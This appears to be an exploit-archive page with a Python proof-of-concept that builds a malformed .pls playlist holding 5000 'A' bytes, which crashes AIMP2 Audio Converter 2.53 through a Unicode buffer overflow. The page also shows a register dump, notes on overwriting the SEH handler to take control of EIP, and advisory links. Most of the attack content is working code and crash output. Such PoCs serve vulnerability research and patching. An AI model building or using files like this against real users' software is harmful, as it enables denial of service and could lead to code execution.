| Risk |
Local |
| Remote |
| High |
No |
| Yes |
#!/usr/bin/python
#
# ######################################################################
#
# AIMP2 Audio Converter <= 2.53 (build 330) (.pls/.m3u) Unicode local crash PoC
# Found & exploited by: mr_me
# Download: ftp://www.catode.ru/AIMP/aimp_2.51.330.zip
# Tested on: Wind0ws XP SP3
#
# ######################################################################
#
# Unicode overflow, maybe someone with better skills can exploit this
# you need to overwrite SEH handler with a CALL EAX 0x00XX00XX instruction.
# Here is the crash breakdown:
#
# EAX 001B0020 UNICODE "AAAAAAAAAAAAAAAAAAAA~
# ECX 00000273
# EDX 00000C4C
# EBX 00000000
# ESP 0012DCA8
# EBP 0012DD64
# ESI 001B6610 UNICODE "AAAAAAAAAAAAAAAAAAAA~
# EDI 00130000 ASCII "Actx "
# EIP 004530C6 AIMP2.004530C6
#
# And then when we pass the exemption handler to overwrite EIP...
#
# EIP 00410041
#
header = ("[playlist]\nNumberOfEntries=3\n\n");
header += ("File1=");
crash = ("\x41" * 5000);
buffer = header + crash
file=open('mr_mes_funky.pls','w')
file.write(buffer)
file.close()
print "[+] mr_mes_funky.pls file created successfully"
References:
http://www.vupen.com/english/advisories/2009/2530
http://www.milw0rm.com/exploits/9561
http://secunia.com/advisories/35295
[ ASCII VERSION ]
|
Topic: